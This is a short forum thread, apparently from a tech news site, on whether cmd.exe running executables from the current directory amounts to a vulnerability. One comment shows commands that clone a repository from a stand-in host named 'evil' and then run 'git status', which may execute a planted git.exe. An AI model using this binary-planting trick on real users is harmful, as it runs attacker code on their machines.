Remix.run Logo
jwolfe 2 hours ago

If bash placed the current directory in your PATH by default, then yes.

lyu07282 43 minutes ago | parent [-]

Could file a CVE with Microsoft then, cause thats kinda what cmd.exe is doing:

    > git clone git://evil evil
    > cd evil\
    > git status
The last line would execute git.exe from the cloned repo, wouldn't it?